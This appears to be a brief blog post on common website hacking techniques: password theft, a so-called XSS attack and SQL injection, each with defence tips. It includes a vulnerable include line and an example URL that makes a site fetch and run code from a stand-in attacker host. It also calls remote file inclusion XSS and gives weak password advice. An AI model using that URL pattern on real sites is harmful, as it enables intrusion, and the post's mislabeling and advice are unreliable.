Here are the most common techniques used to hack a website

Hacking sites that are least protected by password – By pass authentication

It’s the webmaster’s nightmare, hackers accessing the site using stolen passwords which should be under control. Usually hackers will be well known persons who they know. They use various techniques to steal the password. They access their emails; they use key loggers or network sniffers to identify the password which they use for their day to day work.

Hackers can also use techniques such as brute force attack (dictionary attacks) etc and can find the weak passwords. The more the complex password, the more difficult for hackers to identify the password using this method.

How to defend

  • It’s advised to have the passwords made of capital letters, small letters, numbers and symbols and should be at least 6-10 digits long.
  • Change the passwords at frequent interval
  • Don’t store the passwords in email
  • Use the latest antivirus software to make sure that the system is free of key loggers

XSS or the cross site scripting

In this method hacker again access to your website using previously disclosed or undisclosed security vulnerability of the server software or the scripting language. Hackers try to execute a code hosted on a remote computer and will access the secure areas of the websites.

For example in Apache/ php if you try to include a page like this

#include $_GET[page];

And use the get request to include aboutus.php like this http://yoursite.php/?page=aboutus. Hackers can execute remotely hosted page like this http://yoursiite.com/?page=http://hackerssite.com/directorylist.php

This method is the simplest and many variations of the following the methods are there, like using intercepting JavaScript and execute XSS attacks. Now a day it’s too common as the webmasters more towards web2.0 techniques and using loosely coded AJAX techniques.

Read more at http://en.wikipedia.org/wiki/Cross-site_scripting

How to defend

  • Aware of the XSS attacks happening around
  • Update the web server software and server scripting language
  • Disable unwanted service from server software

SQL injection

In this type of attack, hackers take advantage of the comprised database. Hackers inject carefully written SQL codes through the forms available on the website. [registration, feedback form etc]. read more about these type of attach here

http://www.unixwiz.net/techtips/sql-injection.html

http://en.wikipedia.org/wiki/SQL_injection

Ways to protect

  • Clean up the inputs before inserting to the database
  • Properly escape input strings

Explore More

BLINK HACKER GROUP HACKED Khitlunge

A hacker group named themselves BLINK HACKER hacked http://www.khitlunge.net.mm and it’s a social and news site for Myanmar Latest News, Myanmar Breaking News, Myanmar Update News. I don’t know how

Read More

Web threats to surpass e-mail pests

E-mail has traditionally been the top means of attack, with messages laden with Trojan horses and other malicious programs hitting inboxes. But the balance is about to tip as cybercrooks

Read More

Hard disk data recovery – Recover from damaged disk? Wipe out the harddisk to avoid spying

Think of the time you take to copy a 1 GB file to the hard disk drive and the time taken to delete the same file. Doesn’t it take very

Read More